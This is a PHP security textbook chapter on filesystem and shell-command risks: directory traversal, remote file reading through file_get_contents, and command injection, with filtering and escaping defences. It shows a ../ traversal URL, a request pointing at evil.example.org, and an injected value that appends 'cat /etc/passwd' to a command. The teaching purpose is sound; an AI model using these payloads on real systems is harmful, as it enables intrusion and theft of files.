Chapter 6. Files and Commands

This chapter discusses the risks associated with the use of files and shell commands. PHP has a rich collection of filesystem functions, as well as a few different options for issuing shell commands. In this chapter, I highlight the most common mistakes that developers tend to make regarding the use of these features.

In general, the risks associated with these features resemble many of the risks already covered in this book—using tainted data can have disastrous side effects. Although the vulnerabilities themselves are unique, the practices that you can use to protect your applications are practices that you have already learned.

Traversing the Filesystem

Whenever you use a file in any way, you must indicate the filename at some point. In many cases, the filename is given as an argument to fopen(), and other functions use the handle that it returns:

    <?php

    $handle = fopen('/path/to/myfile.txt', 'r');

    ?>

A vulnerability exists when you use tainted data as part of the filename:

    <?php

    $handle = fopen("/path/to/{$_GET['filename']}.txt", 'r');

    ?>

Because the leading and trailing parts of the full path and filename cannot be manipulated by an attacker in this example, the exploit possibilities are somewhat limited. However, keep in mind that some attacks use a null byte (%00 when passed in the query string) to terminate a string, which sidesteps any filename extension that you append. In this case, the most dangerous exploit is one in which the attacker traverses the filesystem by using multiple instances of the string ../ to move up the directory tree. For example, imagine a value of filename being passed as follows:

    http://example.org/file.php?filename=../../../../../another/path/to/file

Tip

As is the case with many attacks, using tainted data in the construction of a string provides an attacker with an opportunity to change the string, and this can cause your application to behave unexpectedly. If you begin a habit of using only filtered data to create any dynamic string, you can begin to protect yourself from many types of vulnerabilities, including those with which you might not be familiar.

Because the leading static portion of the filename used in the original fopen() call is /path/to/, this attack traverses up more than is necessary. The attacker does not have the benefit of observing the source code before launching the attack, so the strategy is typically to repeat the string ../ more times than is expected to be necessary. Using too many does not disrupt the attack, so it is not necessary that the attacker guess the correct depth.

This particular attack alters the intended behavior of the fopen() call, reducing it to the following:

    <?php

    $handle = fopen('/another/path/to/file.txt', 'r');

    ?>
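
To make this reduction concrete, here is a minimal sketch that collapses the ../ segments the way the filesystem eventually would. The collapse_path() function is a hypothetical helper written for this illustration, not a PHP built-in, and it assumes absolute Unix-style paths:

```php
<?php

/**
 * Hypothetical helper (not part of PHP): collapses "." and ".." segments
 * in an absolute Unix-style path without touching the filesystem.
 */
function collapse_path($path)
{
    $resolved = array();

    foreach (explode('/', $path) as $segment)
    {
        if ($segment === '' || $segment === '.')
        {
            continue; // Empty and "." segments do not change the location.
        }

        if ($segment === '..')
        {
            array_pop($resolved); // Move up one level; a no-op at the root.
        }
        else
        {
            $resolved[] = $segment;
        }
    }

    return '/' . implode('/', $resolved);
}

// The value from the example request above.
$tainted = '../../../../../another/path/to/file';

echo collapse_path("/path/to/{$tainted}.txt"), "\n";
// Prints: /another/path/to/file.txt
```

Once the root is reached, the surplus ../ segments have no further effect, which is why the attacker does not need to guess the correct depth.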

Upon noticing this problem, or after being the victim of an attack, many developers make the mistake of trying to correct potentially malicious data, sometimes without even inspecting it first. As described in Chapter 1, the best approach is to treat filtering as an inspection process and to force the user to abide by your rules. For example, if every valid filename consists of only alphabetic characters, the following code can enforce this restriction:

    <?php

    $clean = array();

    if (ctype_alpha($_GET['filename']))
    {
      $clean['filename'] = $_GET['filename'];
    }
    else
    {
      /* ... */
    }

    $handle = fopen("/path/to/{$clean['filename']}.txt", 'r');

    ?>

Tip

It is not necessary to escape the filename in any way because this data is being used only in a PHP function—it is not being sent to a remote system.

The basename() function can be useful for inspecting a string to check for unwanted path information:

    <?php

    $clean = array();

    if (basename($_GET['filename']) == $_GET['filename'])
    {
      $clean['filename'] = $_GET['filename'];
    }
    else
    {
      /* ... */
    }

    $handle = fopen("/path/to/{$clean['filename']}.txt", 'r');

    ?>

This approach is slightly less secure than enforcing that the filename consists of only alphabetic characters, but you may not be able to be quite as strict. A good Defense in Depth approach is to combine both methods, especially if you use a regular expression to inspect the data for valid characters (instead of a function like ctype_alpha()).
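
As a rough sketch of combining the two checks, the following uses basename() to reject path information and a regular expression to enforce a list of valid characters. The is_valid_filename() function and the particular character set (letters, digits, underscores, and hyphens) are assumptions chosen for illustration; adjust them to fit the names that your application actually uses:

```php
<?php

/**
 * Hypothetical filter: returns true only when $filename has no path
 * information and consists solely of characters on the allowed list.
 * The allowed character set is an assumption for illustration.
 */
function is_valid_filename($filename)
{
    if (!is_string($filename))
    {
        return false;
    }

    if (basename($filename) !== $filename)
    {
        return false; // Contains directory information.
    }

    // The D modifier keeps $ from matching before a trailing newline.
    return preg_match('/^[A-Za-z0-9_-]+$/D', $filename) === 1;
}

$clean = array();
$input = isset($_GET['filename']) ? $_GET['filename'] : null;

if (is_valid_filename($input))
{
    $clean['filename'] = $input;
}
```

Either check alone would reject the traversal attempt shown earlier. Using both means that a mistake in one of them is less likely to leave a gap.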

A more dangerous vulnerability exists when the entire trailing part of the filename is tainted:

    <?php

    $handle = fopen("/path/to/{$_GET['filename']}", 'r');

    ?>

The increased flexibility given to an attacker increases the magnitude of the vulnerability. In this particular case, an attacker can manipulate the filename to refer to any file on the filesystem regardless of the path or file extension, because the file extension is provided as part of $_GET['filename']. As long as the web server has read access to the file, the handle refers to a file chosen by the attacker.

This type of vulnerability becomes even more substantial if the leading part of the path is tainted, and this is the topic of the next section.

Remote File Risks

PHP has a configuration directive called allow_url_fopen that is enabled by default. It allows you to reference many types of resources as though they were local files. For example, you can retrieve the content (HTML) of a particular page by reading from a URL:

    <?php

    $contents = file_get_contents('http://example.org/');

    ?>

As discussed in Chapter 5, this can create severe vulnerabilities when tainted data is used to reference a file in include or require statements. In fact, I consider this particular type of vulnerability to be one of the most dangerous vulnerabilities possible in a PHP application because it allows an attacker to execute arbitrary code.

Although slightly less severe in magnitude, similar vulnerabilities exist when tainted data is used to reference a file in standard filesystem functions. For example, consider reading a file as follows:

    <?php

    $contents = file_get_contents($_GET['filename']);

    ?>

This particular example lets a user manipulate the behavior of file_get_contents() so that it retrieves the contents of a remote resource. Consider a request similar to the following:

    http://example.org/file.php?filename=http%3A%2F%2Fevil.example.org%2Fxss.html

This results in a situation in which $contents is tainted, a fact obscured by the indirect way in which it is obtained. This is another reason why Defense in Depth is such a strong principle—by treating the filesystem as a remote source of data, the value of $contents is considered to be input anyway, so your filtering logic can potentially save the day.

Because $contents is tainted, it can lead to many other types of security vulnerabilities, including cross-site scripting and SQL injection. For example, the following illustrates a cross-site scripting vulnerability:

    <?php

    $contents = file_get_contents($_GET['filename']);

    echo $contents;

    ?>

The solution is to never use tainted data to refer to a filename. Always filter input and be sure to use only filtered data when referencing a filename:

    <?php

    $clean = array();

    /* Filter Input ($_GET['filename']) */

    $contents = file_get_contents($clean['filename']);

    ?>
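
One possible way to fill in the filtering step is to accept only names that appear on a fixed list. This is a minimal sketch under that assumption; the filter_filename() function and the entries in $allowed are hypothetical placeholders:

```php
<?php

/**
 * Hypothetical filter: accepts a requested name only if it appears on a
 * fixed list of known files. The list contents are placeholders.
 */
function filter_filename($requested, array $allowed)
{
    // The strict flag makes in_array() compare with ===.
    if (is_string($requested) && in_array($requested, $allowed, true))
    {
        return $requested;
    }

    return null;
}

$clean = array();
$allowed = array('news.txt', 'about.txt');

$requested = isset($_GET['filename']) ? $_GET['filename'] : null;
$filtered = filter_filename($requested, $allowed);

if ($filtered !== null)
{
    $clean['filename'] = $filtered;
}
```

Because a URL such as http://evil.example.org/xss.html is not on the list, it never reaches file_get_contents().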

Although this does not guarantee anything about the data within $contents, it does give you reasonable assurance that you are reading a file that you intend to be reading, rather than one chosen by an attacker. To strengthen this approach, you should also treat $contents as input and filter it prior to use:

    <?php

    $clean = array();
    $html = array();

    /* Filter Input ($_GET['filename']) */

    $contents = file_get_contents($clean['filename']);

    /* Filter Input ($contents) */

    $html['contents'] = htmlentities($clean['contents'], ENT_QUOTES, 'UTF-8');

    echo $html['contents'];

    ?>
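
To show the effect of the final escaping step, this small sketch passes a hypothetical payload through htmlentities(). The payload stands in for the content of a file chosen by an attacker:

```php
<?php

// Hypothetical content, standing in for what a file chosen by an
// attacker might contain.
$contents = '<script>alert("xss")</script>';

$html = array();
$html['contents'] = htmlentities($contents, ENT_QUOTES, 'UTF-8');

echo $html['contents'], "\n";
// Prints: &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt;
```

The browser displays the escaped markup as text instead of interpreting it as a script.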

This provides a very strong defense against numerous types of attacks, and it is the recommended approach.

Command Injection

The use of system commands is a dangerous operation, and this is particularly true when you use remote data to construct the command to be issued. When tainted data is used, this represents a command injection vulnerability.

The exec() function is a popular function used to execute a shell command. It returns the last line of the output of the command, but you can specify an array as the second argument, and each line of output is stored as an element of that array. An optional third argument receives the return status of the command. It can be used as follows:

    <?php

    $last = exec('ls -l', $output, $return);

    print_r($output);
    echo "Return [$return]";

    ?>

Assume that the ls -l command provides the following output when executed manually from the shell:

    $ ls -l
    total 0
    -rw-rw-r--  1 chris chris 0 May 21 12:34 php-security
    -rw-rw-r--  1 chris chris 0 May 21 12:34 chris-shiflett

When executed with exec() as shown in the prior example, the following output is generated:

    Array
    (
        [0] => total 0
        [1] => -rw-rw-r--  1 chris chris 0 May 21 12:34 php-security
        [2] => -rw-rw-r--  1 chris chris 0 May 21 12:34 chris-shiflett
    )
    Return [0]

This is a useful and convenient way to execute shell commands, but this convenience heightens your risk. If tainted data is used to construct the string to be executed, an attacker can execute arbitrary commands.
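
To see why, consider how the command string is assembled. The following sketch builds a string the way a vulnerable script might, but only prints it rather than executing it. The build_listing_command() function and the tainted value are hypothetical:

```php
<?php

/**
 * Hypothetical, deliberately unsafe helper: builds the command string the
 * way a vulnerable script might. The string is returned, not executed.
 */
function build_listing_command($directory)
{
    return "ls -l {$directory}";
}

// A value an attacker might supply in place of a directory name.
$tainted = '/tmp; cat /etc/passwd';

echo build_listing_command($tainted), "\n";
// Prints: ls -l /tmp; cat /etc/passwd
```

A shell treats the semicolon as a command separator, so passing this string to exec() would run the second command as well as the first.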

I recommend that you avoid using shell commands when possible and, when you must use them, ensure that you use only filtered data to construct the string to be executed, and always escape your output:

    <?php

    $clean = array();
    $shell = array();

    /* Filter Input ($command, $argument) */

    $shell['command'] = escapeshellcmd($clean['command']);
    $shell['argument'] = escapeshellarg($clean['argument']);

    $last = exec("{$shell['command']} {$shell['argument']}", $output, $return);

    ?>
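
As an illustration of what the escaping step does to an argument, this sketch prints a command string instead of executing it. The build_safe_listing_command() function is hypothetical, and the output shown in the comment assumes a Unix-like system; escapeshellarg() quotes differently on Windows:

```php
<?php

/**
 * Hypothetical helper: builds a listing command with its single argument
 * escaped for the shell. The string is returned, not executed.
 */
function build_safe_listing_command($directory)
{
    return 'ls -l ' . escapeshellarg($directory);
}

echo build_safe_listing_command('/tmp; cat /etc/passwd'), "\n";
// On a Unix-like system, prints: ls -l '/tmp; cat /etc/passwd'
```

Inside the quotes, the semicolon is part of a single argument to ls rather than a command separator. Escaping complements filtering; it does not replace it.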

Although you can execute shell commands in many different ways, the best practice is to be consistent: use only filtered and escaped data when constructing the string to be executed. Other features that require the same careful attention include passthru(), popen(), proc_open(), shell_exec(), system(), and the backtick operator. If at all possible, I recommend avoiding the use of shell commands altogether.